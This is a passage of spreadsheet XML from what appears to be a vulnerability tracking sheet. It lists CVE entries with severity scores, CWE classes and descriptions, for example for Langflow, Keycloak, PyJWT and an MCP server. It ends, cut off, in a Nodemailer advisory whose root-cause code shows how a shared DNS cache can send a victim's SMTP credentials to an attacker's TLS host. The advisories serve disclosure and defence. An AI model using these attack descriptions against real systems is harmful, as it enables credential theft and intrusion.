      <c r="P143" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q143" s="5" t="inlineStr"/>
      <c r="R143" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-434</t>
        </is>
      </c>
      <c r="S143" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in mwasikz robo-cafe-rms up to 228c44a02823f04e85db32b7137809a2856148fc. The affected element is an unknown function of the file manage-food.php. Such manipulation leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. This product operates on a rolling release basis, ensuring continuous delivery. Consequently, there are no version details for either affected or updated releases. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T143" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102263</t>
        </is>
      </c>
    </row>
    <row r="144">
      <c r="A144" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B144" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C144" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59563</t>
        </is>
      </c>
      <c r="D144" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="E144" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F144" s="5" t="inlineStr">
        <is>
          <t>cve@zscaler.com</t>
        </is>
      </c>
      <c r="G144" s="5" t="inlineStr"/>
      <c r="H144" s="5" t="inlineStr"/>
      <c r="I144" s="5" t="inlineStr"/>
      <c r="J144" s="5" t="inlineStr">
        <is>
          <t>zscaler</t>
        </is>
      </c>
      <c r="K144" s="5" t="inlineStr"/>
      <c r="L144" s="5" t="inlineStr"/>
      <c r="M144" s="5" t="inlineStr"/>
      <c r="N144" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O144" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P144" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q144" s="5" t="inlineStr"/>
      <c r="R144" s="5" t="inlineStr">
        <is>
          <t>CWE-305</t>
        </is>
      </c>
      <c r="S144" s="5" t="inlineStr">
        <is>
          <t>Zscaler MCP Server versions 0.7.0 and 0.7.1 has an issue where HMAC confirmation tokens were not bound to the target resource identifier, allowing an MCP client or agent to replay a token generated for one resource to affect another resource of the same type. This issue is fixed in version 0.7.2.</t>
        </is>
      </c>
      <c r="T144" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59563</t>
        </is>
      </c>
    </row>
    <row r="145">
      <c r="A145" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B145" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C145" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102270</t>
        </is>
      </c>
      <c r="D145" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="E145" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F145" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G145" s="5" t="inlineStr"/>
      <c r="H145" s="5" t="inlineStr"/>
      <c r="I145" s="5" t="inlineStr"/>
      <c r="J145" s="5" t="inlineStr">
        <is>
          <t>express, python, gin</t>
        </is>
      </c>
      <c r="K145" s="5" t="inlineStr"/>
      <c r="L145" s="5" t="inlineStr"/>
      <c r="M145" s="5" t="inlineStr"/>
      <c r="N145" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O145" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P145" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q145" s="5" t="inlineStr"/>
      <c r="R145" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="S145" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. Prior to 2.14.0, PyJWT is_pem_format is affected because lazy PEM regular expression backtracks extensively. This occurs when a certificate-like input contains repeated BEGIN markers without a matching END marker. As a result, is_pem_format performs unbounded backtracking while searching for a PEM end marker. Consequently, an attacker can cause intensive CPU consumption. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T145" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102270</t>
        </is>
      </c>
    </row>
    <row r="146">
      <c r="A146" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B146" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C146" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101006</t>
        </is>
      </c>
      <c r="D146" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E146" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F146" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G146" s="5" t="inlineStr"/>
      <c r="H146" s="5" t="inlineStr"/>
      <c r="I146" s="5" t="inlineStr"/>
      <c r="J146" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K146" s="5" t="inlineStr"/>
      <c r="L146" s="5" t="inlineStr"/>
      <c r="M146" s="5" t="inlineStr"/>
      <c r="N146" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O146" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P146" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q146" s="5" t="inlineStr"/>
      <c r="R146" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-863</t>
        </is>
      </c>
      <c r="S146" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in Frappe HR up to 16.15.0. This vulnerability affects the function get_expense_claims/get_shift_requests/get_attendance_requests of the file hrms/api/__init__.py of the component Permission Validation. This manipulation of the argument employee causes incorrect authorization. Remote exploitation of the attack is possible. The vendor replied: "This issue has already been reported by another individual, and based on that, we have fixed it."</t>
        </is>
      </c>
      <c r="T146" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101006</t>
        </is>
      </c>
    </row>
    <row r="147">
      <c r="A147" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B147" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C147" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101278</t>
        </is>
      </c>
      <c r="D147" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E147" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F147" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G147" s="5" t="inlineStr"/>
      <c r="H147" s="5" t="inlineStr"/>
      <c r="I147" s="5" t="inlineStr"/>
      <c r="J147" s="5" t="inlineStr">
        <is>
          <t>gin, rust</t>
        </is>
      </c>
      <c r="K147" s="5" t="inlineStr"/>
      <c r="L147" s="5" t="inlineStr"/>
      <c r="M147" s="5" t="inlineStr"/>
      <c r="N147" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O147" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P147" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q147" s="5" t="inlineStr"/>
      <c r="R147" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-346</t>
        </is>
      </c>
      <c r="S147" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in Trusted Domain Project OpenDMARC up to 1.4.2. This affects the function opendmarc_get_tld of the file libopendmarc/opendmarc_tld.c : of the component PSL Wildcard Handler. Executing a manipulation can lead to origin validation error. The attack may be launched remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T147" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101278</t>
        </is>
      </c>
    </row>
    <row r="148">
      <c r="A148" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B148" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C148" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13018</t>
        </is>
      </c>
      <c r="D148" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E148" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F148" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G148" s="5" t="inlineStr"/>
      <c r="H148" s="5" t="inlineStr"/>
      <c r="I148" s="5" t="inlineStr"/>
      <c r="J148" s="5" t="inlineStr">
        <is>
          <t>go, rust</t>
        </is>
      </c>
      <c r="K148" s="5" t="inlineStr"/>
      <c r="L148" s="5" t="inlineStr"/>
      <c r="M148" s="5" t="inlineStr"/>
      <c r="N148" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O148" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P148" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q148" s="5" t="inlineStr"/>
      <c r="R148" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S148" s="5" t="inlineStr">
        <is>
          <t>Insufficient validation of untrusted input in Codecs in Google Chrome prior to 147.0.7727.55 allowed a remote attacker to potentially perform out of bounds memory access via a crafted video file. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="T148" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13018</t>
        </is>
      </c>
    </row>
    <row r="149">
      <c r="A149" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B149" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C149" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101861</t>
        </is>
      </c>
      <c r="D149" s="5" t="n">
        <v>4.1</v>
      </c>
      <c r="E149" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F149" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G149" s="5" t="inlineStr"/>
      <c r="H149" s="5" t="inlineStr"/>
      <c r="I149" s="5" t="inlineStr"/>
      <c r="J149" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K149" s="5" t="inlineStr"/>
      <c r="L149" s="5" t="inlineStr"/>
      <c r="M149" s="5" t="inlineStr"/>
      <c r="N149" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O149" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P149" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q149" s="5" t="inlineStr"/>
      <c r="R149" s="5" t="inlineStr">
        <is>
          <t>CWE-94, CWE-95</t>
        </is>
      </c>
      <c r="S149" s="5" t="inlineStr">
        <is>
          <t>Langflow 1.0.16 before 1.12.0 and 0.0.94 before 1.12.0 contain an unsafe eval() vulnerability in schema.py that allows authenticated attackers to achieve code execution by placing a Python object with a malicious __repr__ method into component input options lists. The eval() sink is triggered when a component is converted into a LangChain tool via ComponentToolkit.get_tools(), including during custom component saves through the API, by interpolating options into a Literal type string that is passed directly to eval() without safe evaluation controls.</t>
        </is>
      </c>
      <c r="T149" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101861</t>
        </is>
      </c>
    </row>
    <row r="150">
      <c r="A150" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B150" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C150" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97026</t>
        </is>
      </c>
      <c r="D150" s="5" t="n">
        <v>3.9</v>
      </c>
      <c r="E150" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F150" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G150" s="5" t="inlineStr"/>
      <c r="H150" s="5" t="inlineStr"/>
      <c r="I150" s="5" t="inlineStr"/>
      <c r="J150" s="5" t="inlineStr">
        <is>
          <t>tempo, rust</t>
        </is>
      </c>
      <c r="K150" s="5" t="inlineStr"/>
      <c r="L150" s="5" t="inlineStr"/>
      <c r="M150" s="5" t="inlineStr"/>
      <c r="N150" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O150" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P150" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q150" s="5" t="inlineStr"/>
      <c r="R150" s="5" t="inlineStr">
        <is>
          <t>CWE-378</t>
        </is>
      </c>
      <c r="S150" s="5" t="inlineStr">
        <is>
          <t>Flatpak creates temporary child repository directories under the user cache with world-writable permissions (0777). On multi-user systems with a permissive umask, other local users could read or modify the temporary directory used while installing apps or runtimes, potentially causing installation failures (denial of service); tampered content would fail signature/digest verification rather than being trusted.</t>
        </is>
      </c>
      <c r="T150" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97026</t>
        </is>
      </c>
    </row>
    <row r="151">
      <c r="A151" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B151" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C151" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101333</t>
        </is>
      </c>
      <c r="D151" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E151" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F151" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G151" s="5" t="inlineStr"/>
      <c r="H151" s="5" t="inlineStr"/>
      <c r="I151" s="5" t="inlineStr"/>
      <c r="J151" s="5" t="inlineStr">
        <is>
          <t>keycloak, requests, gin</t>
        </is>
      </c>
      <c r="K151" s="5" t="inlineStr"/>
      <c r="L151" s="5" t="inlineStr"/>
      <c r="M151" s="5" t="inlineStr"/>
      <c r="N151" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O151" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P151" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q151" s="5" t="inlineStr"/>
      <c r="R151" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S151" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the Micrometer user-event metrics listener of Keycloak, a solution for integrated identity and access management. The issue occurs when the listener is configured to include the idp tag. An unauthenticated attacker can send requests to the identity broker login endpoint using arbitrary provider aliases, causing the system to create an unlimited number of metric time series. This can lead to excessive memory consumption and degrade the performance of both the server and its monitoring tools.</t>
        </is>
      </c>
      <c r="T151" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101333</t>
        </is>
      </c>
    </row>
    <row r="152">
      <c r="A152" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B152" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C152" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101915</t>
        </is>
      </c>
      <c r="D152" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E152" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F152" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G152" s="5" t="inlineStr"/>
      <c r="H152" s="5" t="inlineStr"/>
      <c r="I152" s="5" t="inlineStr"/>
      <c r="J152" s="5" t="inlineStr">
        <is>
          <t>grpc</t>
        </is>
      </c>
      <c r="K152" s="5" t="inlineStr"/>
      <c r="L152" s="5" t="inlineStr"/>
      <c r="M152" s="5" t="inlineStr"/>
      <c r="N152" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O152" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P152" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q152" s="5" t="inlineStr"/>
      <c r="R152" s="5" t="inlineStr">
        <is>
          <t>CWE-550</t>
        </is>
      </c>
      <c r="S152" s="5" t="inlineStr">
        <is>
          <t>@grpc/grpc-js implements the core functionality of gRPC purely in JavaScript, without a C++ addon. Prior to 1.13.6 and 1.14.5, when an application method handler throws an uncaught error, the server includes its error message in the status message sent to the client. The thrown error message is transmitted to the client, causing sensitive information disclosure when the message contains sensitive data. This issue is fixed in versions 1.13.6 and 1.14.5.</t>
        </is>
      </c>
      <c r="T152" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101915</t>
        </is>
      </c>
    </row>
    <row r="153">
      <c r="A153" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B153" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C153" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102264</t>
        </is>
      </c>
      <c r="D153" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="E153" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F153" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G153" s="5" t="inlineStr"/>
      <c r="H153" s="5" t="inlineStr"/>
      <c r="I153" s="5" t="inlineStr"/>
      <c r="J153" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K153" s="5" t="inlineStr"/>
      <c r="L153" s="5" t="inlineStr"/>
      <c r="M153" s="5" t="inlineStr"/>
      <c r="N153" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O153" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P153" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q153" s="5" t="inlineStr"/>
      <c r="R153" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="S153" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in mwasikz robo-cafe-rms up to 228c44a02823f04e85db32b7137809a2856148fc. The impacted element is an unknown function of the file frontend/update-account.php of the component Edit Profile Feature. Performing a manipulation of the argument Name/Address/City results in cross site scripting. Remote exploitation of the attack is possible. The exploit has been made public and could be used. This product follows a rolling release approach for continuous delivery, so version details for affected or updated releases are not provided. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T153" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102264</t>
        </is>
      </c>
    </row>
    <row r="154">
      <c r="A154" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B154" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C154" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101131</t>
        </is>
      </c>
      <c r="D154" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="E154" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F154" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G154" s="5" t="inlineStr"/>
      <c r="H154" s="5" t="inlineStr"/>
      <c r="I154" s="5" t="inlineStr"/>
      <c r="J154" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K154" s="5" t="inlineStr"/>
      <c r="L154" s="5" t="inlineStr"/>
      <c r="M154" s="5" t="inlineStr"/>
      <c r="N154" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O154" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P154" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q154" s="5" t="inlineStr"/>
      <c r="R154" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-807</t>
        </is>
      </c>
      <c r="S154" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in deepseek-ai deepseek-harness up to 0.1.5-rc.3. Impacted is an unknown function of the file packages/e2b/e2b/src/index.ts of the component dsh. The manipulation of the argument E2B_API_KEY leads to reliance on untrusted inputs in a security decision. Local access is required to approach this attack. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T154" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101131</t>
        </is>
      </c>
    </row>
    <row r="155">
      <c r="A155" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B155" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C155" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101079</t>
        </is>
      </c>
      <c r="D155" s="5" t="n">
        <v>2.8</v>
      </c>
      <c r="E155" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F155" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G155" s="5" t="inlineStr"/>
      <c r="H155" s="5" t="inlineStr"/>
      <c r="I155" s="5" t="inlineStr"/>
      <c r="J155" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K155" s="5" t="inlineStr"/>
      <c r="L155" s="5" t="inlineStr"/>
      <c r="M155" s="5" t="inlineStr"/>
      <c r="N155" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O155" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P155" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q155" s="5" t="inlineStr"/>
      <c r="R155" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-807</t>
        </is>
      </c>
      <c r="S155" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in agentverus agentverus-scanner up to 0.8.1. Affected by this vulnerability is the function isSecurityDefenseSkill of the file dist/scanner/analyzers/context.js. Performing a manipulation results in reliance on untrusted inputs in a security decision. The attack must be initiated from a local position. The exploit has been made public and could be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T155" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101079</t>
        </is>
      </c>
    </row>
    <row r="156">
      <c r="A156" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B156" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C156" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101080</t>
        </is>
      </c>
      <c r="D156" s="5" t="n">
        <v>0.9</v>
      </c>
      <c r="E156" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F156" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G156" s="5" t="inlineStr"/>
      <c r="H156" s="5" t="inlineStr"/>
      <c r="I156" s="5" t="inlineStr"/>
      <c r="J156" s="5" t="inlineStr">
        <is>
          <t>f5</t>
        </is>
      </c>
      <c r="K156" s="5" t="inlineStr"/>
      <c r="L156" s="5" t="inlineStr"/>
      <c r="M156" s="5" t="inlineStr"/>
      <c r="N156" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O156" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P156" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q156" s="5" t="inlineStr"/>
      <c r="R156" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S156" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in Tencent AI-Infra-Guard up to 4.5.2/4.6.2. This affects the function startsWith of the file skill_scan/tools/dir/dir_actions.py of the component File Access. The manipulation leads to path traversal. The attack needs to be performed locally. The exploit is publicly available and might be used. Upgrading to version 4.6.0 is able to mitigate this issue. The identifier of the patch is ac0384edc9dbea3b226edefcf50613bd8509134f. You should upgrade the affected component.</t>
        </is>
      </c>
      <c r="T156" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101080</t>
        </is>
      </c>
    </row>
    <row r="157">
      <c r="A157" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B157" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C157" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100701</t>
        </is>
      </c>
      <c r="D157" s="5" t="inlineStr"/>
      <c r="E157" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F157" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G157" s="5" t="inlineStr"/>
      <c r="H157" s="5" t="inlineStr"/>
      <c r="I157" s="5" t="inlineStr"/>
      <c r="J157" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K157" s="5" t="inlineStr"/>
      <c r="L157" s="5" t="inlineStr">
        <is>
          <t>npm:nodemailer</t>
        </is>
      </c>
      <c r="M157" s="5" t="inlineStr">
        <is>
          <t>10.0.2</t>
        </is>
      </c>
      <c r="N157" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O157" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P157" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q157" s="5" t="inlineStr"/>
      <c r="R157" s="5" t="inlineStr"/>
      <c r="S157" s="5" t="inlineStr">
        <is>
          <t>### Summary
Nodemailer's process-global DNS cache is keyed only by `host`, but each cache entry also stores the caller-specific TLS `servername`. When two direct SMTPS transports use the same DNS host with different `tls.servername` values, the first transport's server name is returned to the second transport and overwrites its explicitly configured value.
As a result, Nodemailer sends the wrong SNI value and verifies the peer certificate against the wrong identity. In a multi-tenant service or SNI-routed SMTP gateway, one tenant can prime the cache so that a victim transport connects to the attacker's TLS virtual host, accepts the attacker's certificate with `rejectUnauthorized: true`, and sends the victim's SMTP credentials to it.
## Affected component
- **Ecosystem:** npm
- **Package:** `nodemailer`
- **Repository:** https://github.com/nodemailer/nodemailer
- **Tested version:** `10.0.1`
- **Tested commit:** `40d52215aac65b811d7e131bc916f68605efd9d2`
- **Runtime-confirmed vulnerable versions:** `5.0.0` and `10.0.1`
- **Affected versions:** `&gt;= 5.0.0, &lt;= 10.0.1`
- **Patched versions:** None known at the time of this report
- **Affected mode:** Direct TLS/SMTPS connections (`secure: true`) where different transports use the same non-IP `host` and different TLS `servername` values
The vulnerable cache implementation was introduced in commit `6859b5dd96c8d9f0070a3169a877181b71df4a3b` on 2018-12-28. Git history shows `v5.0.0` as the first release tag containing that commit. The behavior remains present in `v10.0.1`.
## Details
### Root cause
`src/shared/index.ts` defines one module-global DNS cache, keyed only by the DNS host:
```ts
export const dnsCache = new Map&lt;string, DnsCacheEntry&gt;();
```
Although the cache key contains only `host`, the cached value contains both DNS addresses and the request-specific TLS identity:
```ts
const value: DnsCacheValue = {
    addresses: allAddresses,
    servername: options.servername || host
};
dnsCache.set(host, {
    value,
    expires: Date.now() + (options.dnsTtl || DNS_TTL)
});
```
On a cache hit, `resolveHostname()` returns the cached `servername` without considering the current call's `options.servername`:
```ts
if (!cached.expires || cached.expires &gt;= now) {
    return callback(
        null,
        formatDNSValue(cached.value, {
            cached: true
        })
    );
}
```
`formatDNSValue()` copies that stale value into the result:
```ts
return Object.assign(
    {
        servername: value.servername,
        host,
        _addresses: addresses
    },
    extra || {}
);
```
For a direct TLS connection, `SMTPConnection.connect()` initially copies the current transport's TLS configuration into `opts`. `_resolveAndConnect()` then overwrites every truthy field with the cached resolver result, including `opts.servername`:
```ts
Object.assign(opts, this.options.tls || {});
if (this.servername &amp;&amp; !opts.servername) {
    opts.servername = this.servername;
}
